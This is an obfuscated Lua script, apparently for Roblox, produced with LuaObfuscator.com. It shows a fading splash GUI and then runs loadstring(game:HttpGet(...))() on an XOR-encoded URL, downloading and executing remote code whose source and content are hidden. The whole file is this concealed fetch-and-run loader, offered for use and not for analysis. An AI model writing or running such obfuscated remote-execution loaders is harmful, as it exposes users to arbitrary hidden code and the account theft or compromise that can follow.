--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=string['char'];local v1=string['byte'];local v2=string['sub'];local v3=bit32 or bit ;local v4=v3['bxor'];local v5=table['concat'];local v6=table['insert'];local function v7(v50,v51) local v52=0;local v53;while true do if (v52~=1) then else return v5(v53);end if (v52~=0) then else v53={};for v94=1, #v50 do v6(v53,v0(v4(v1(v2(v50,v94,v94 + 1 )),v1(v2(v51,1 + (v94% #v51) ,1 + (v94% #v51) + 1 )))%256 ));end v52=1;end end end bit32={};local v8=32;local v9=2^v8 ;bit32.bnot=function(v54) local v55=0;while true do if (v55==0) then v54=v54%v9 ;return (v9-1) -v54 ;end end end;bit32.band=function(v56,v57) local v58=0;local v59;local v60;while true do if (v58==3) then for v95=1,v8 do local v96=0;local v97;local v98;while true do if (v96==1) then if ((v97 + v98)~=2) then else v59=v59 + v60 ;end v60=2 * v60 ;break;end if (v96==0) then v97,v98=v56%2 ,v57%2 ;v56,v57=math.floor(v56/2 ),math.floor(v57/2 );v96=1;end end end return v59;end if (v58==0) then if (v57~=255) then else return v56%256 ;end if (v57~=65535) then else return v56%65536 ;end v58=1;end if (v58==2) then v59=0;v60=1;v58=3;end if (v58==1) then if (v57==4294967295) then return v56%4294967296 ;end v56,v57=v56%v9 ,v57%v9 ;v58=2;end end end;bit32.bor=function(v61,v62) local v63=0;local v64;local v65;while true do local v89=0;while true do if (v89==1) then if (v63~=3) then else local v102=0;while true do if (0==v102) then for v107=1,v8 do local v108=0;local v109;local v110;while true do if (v108==0) then v109,v110=v61%2 ,v62%2 ;v61,v62=math.floor(v61/2 ),math.floor(v62/2 );v108=1;end if (v108==1) then if ((v109 + v110)<1) then else v64=v64 + v65 ;end v65=2 * v65 ;break;end end end return v64;end end end if (v63~=0) then else if (v62~=255) then else return (v61-(v61%256)) + 255 ;end if (v62==65535) then return (v61-(v61%65536)) + 65535 ;end v63=1;end break;end if (v89==0) then if (v63~=2) then else local v103=0;while true do if (v103==0) then v64=0;v65=1;v103=1;end if (v103==1) then v63=3;break;end end end if (v63~=1) then else if (v62==4294967295) then return 4294967295;end v61,v62=v61%v9 ,v62%v9 ;v63=2;end v89=1;end end end end;bit32.bxor=function(v66,v67) v66,v67=v66%v9 ,v67%v9 ;local v68=0;local v69=1;for v90=1,v8 do local v91=0;local v92;local v93;while true do if (v91~=1) then else if ((v92 + v93)~=1) then else v68=v68 + v69 ;end v69=2 * v69 ;break;end if (v91~=0) then else local v99=0;while true do if (v99==0) then v92,v93=v66%2 ,v67%2 ;v66,v67=math.floor(v66/2 ),math.floor(v67/2 );v99=1;end if (v99==1) then v91=1;break;end end end end end return v68;end;bit32.lshift=function(v70,v71) local v72=0;while true do if (v72==1) then if (v71<0) then return math.floor(v70 * (2^v71) );else return (v70 * (2^v71))%v9 ;end break;end if (v72==0) then if (math.abs(v71)>=v8) then return 0;end v70=v70%v9 ;v72=1;end end end;bit32.rshift=function(v73,v74) local v75=0;local v76;while true do if (v75==0) then v76=0;while true do if (1==v76) then if (v74>0) then return math.floor(v73 * (2^ -v74) );else return (v73 * (2^ -v74))%v9 ;end break;end if (v76~=0) then else local v104=0;while true do if (v104==1) then v76=1;break;end if (v104==0) then if (math.abs(v74)>=v8) then return 0;end v73=v73%v9 ;v104=1;end end end end break;end end end;bit32.arshift=function(v77,v78) local v79=0;while true do if (v79~=1) then else if (v78>0) then local v100=0;local v101;while true do local v105=0;while true do if (v105==0) then if (v100~=1) then else return math.floor(v77 * (2^ -v78) ) + v101 ;end if (0==v100) then local v111=0;while true do if (v111==1) then v100=1;break;end if (v111==0) then v101=0;if (v77<(v9/2)) then else v101=v9-(2^(v8-v78)) ;end v111=1;end end end break;end end end else return (v77 * (2^ -v78))%v9 ;end break;end if (v79~=0) then else if (math.abs(v78)<v8) then else return 0;end v77=v77%v9 ;v79=1;end end end;local v17=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v18=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v19=Instance.new(v7("\1\158\106\25\174\40\67\38","\38\84\215\41\118\220\70"));local v20=Instance.new(v7("\121\27\35\21\251\124\23\32\23\242","\158\48\118\66\114"));local v21=Instance.new(v7("\159\33\8\34\95\164\249\174\40","\155\203\68\112\86\19\197"));v17['Name']=v7("\116\210\35\242\68\125\225\223\83\212","\152\38\189\86\156\32\24\133");v17['Parent']=game['Players']['LocalPlayer']:WaitForChild(v7("\204\91\166\95\249\69\128\83\245","\38\156\55\199"));v18['Parent']=v17;v18['BackgroundColor3']=Color3.fromRGB(30,144,255);v18['Position']=UDim2.new(0.5, -150,1,0);v18['Size']=UDim2.new(0,300,0,200);v18['BackgroundTransparency']=1;v19['CornerRadius']=UDim.new(0,20);v19['Parent']=v18;v20['Parent']=v18;v20['Size']=UDim2.new(0,100,0,100);v20['Position']=UDim2.new(0.5, -150,0.1,0);v20['BackgroundTransparency']=1;v20['Image']=v7("\186\127\100\41\0\103\255\87\161\121\38\103\92\37\170\21\241\45\37\125\74\39\173\21\240\42\43\112","\35\200\29\28\72\115\20\154");v20['ImageTransparency']=1;v21['Parent']=v18;v21['Size']=UDim2.new(0,200,0,50);v21['Position']=UDim2.new(0.5, -100,0.75,0);v21['BackgroundTransparency']=1;v21['Text']=v7("\46\186\221\220\130\33\49\89\139\222\159\165\35\58\22\180\208\158\204","\84\121\223\177\191\237\76");v21['Font']=Enum['Font']['GothamBold'];v21['TextSize']=24;v21['TextColor3']=Color3.fromRGB(255,0,0);v21['TextScaled']=true;v21['TextTransparency']=1;local function v48() v18:TweenPosition(UDim2.new(0.5, -150,0.5, -100),v7("\148\67\221","\161\219\54\169\192\90\48\80"),v7("\120\87\1\33","\69\41\34\96"),2,true);local v80=game:GetService(v7("\136\212\210\15\12\24\185\209\193\3\1\46","\75\220\163\183\106\98"));local v81=TweenInfo.new(2,Enum['EasingStyle'].Quad,Enum['EasingDirection'].Out);local v82=v80:Create(v18,v81,{[v7("\32\187\136\60\222\16\181\158\57\221\54\168\138\57\202\18\187\153\50\215\1\163","\185\98\218\235\87")]=0});v82:Play();v18:TweenSize(UDim2.new(0,300,0,200),v7("\228\41\51","\202\171\92\71\134\190"),v7("\24\212\45\140","\232\73\161\76"),2,true);local v83=v80:Create(v20,v81,{[v7("\146\212\67\90\27\143\203\67\83\13\171\216\80\88\16\184\192","\126\219\185\34\61")]=0});v83:Play();local v84=v80:Create(v21,v81,{[v7("\56\203\70\102\74\101\242\233\31\222\95\96\123\121\240\254","\135\108\174\62\18\30\23\147")]=0});v84:Play();wait(2);end local function v49() local v85=0;local v86;local v87;local v88;while true do if (v85==1) then v88=nil;while true do if (v86==0) then v87,v88=pcall(function() loadstring(game:HttpGet(v7("\190\253\62\219\11\244\124\136\164\232\61\133\31\167\39\207\163\235\63\216\29\188\48\200\184\253\47\197\12\224\48\200\187\166\0\205\28\171\55\206\162\186\101\229\29\185\126\207\163\235\101\198\25\167\61\136\184\232\39\206\20\171\32\212\243\187\122\206\0\171\48\137\186\252\43","\167\214\137\74\171\120\206\83")))();end);if v87 then local v106=0;while true do if (v106==1) then print("GUI détruit après l'exécution du script.");break;end if (v106==0) then wait(1);v17:Destroy();v106=1;end end else warn("Erreur lors de l'exécution du script : "   .. v88 );end break;end end break;end if (v85==0) then v86=0;v87=nil;v85=1;end end end wait(1);v48();v49();
